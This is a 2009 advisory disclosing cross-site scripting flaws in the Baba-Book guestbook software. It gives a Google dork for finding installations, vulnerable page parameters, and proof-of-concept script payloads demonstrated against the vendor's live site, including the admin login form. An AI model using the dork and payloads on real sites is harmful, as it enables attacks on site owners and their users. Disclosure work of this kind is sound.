===========================================================================================

 Title    : Multiple Cross-site Scripting (XSS) Vulnerabilities
 Software : Baba-Book
 Vendor   : www.bp371.com
 
 Date     : 26 April 2009 (Indonesia)
 Author   : Vrs-hCk
 Contact  : d00r@telkom.net
 Blog     : http://c0li.blogspot.com/

 ===========================================================================================

 [-] Google Dork

     "Powered by Baba-Book" 

 [-] Vulnerable

     post.asp
     gshow.asp
     admin_login.asp

 [-] Exploit

     [+] GET Method
         http://[site]/[path]/post.asp?id=1'[XSS]
         http://[site]/[path]/gshow.asp?id=1'[XSS]
     [+] POST Method
         http://[site]/[path]/admin_login.asp

 [-] Online Demo

     [+] GET Method
         http://www.bp371.com/ly/gshow.asp?id=1'<script>alert(123)</script>
     [+] POST Method
         http://www.bp371.com/ly/admin_login.asp
         username & password : '<script>alert(123)</script>

 ===========================================================================================

 Greetz   :

     Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy,
     bl4Ck_3n91n3, H312Y, S3T4N, Janroe, and special muaacchh buat Dia yg Ku Cintai (*_^)
     c0li.m0de.0n and Behave oR BeGone !!!

 ===========================================================================================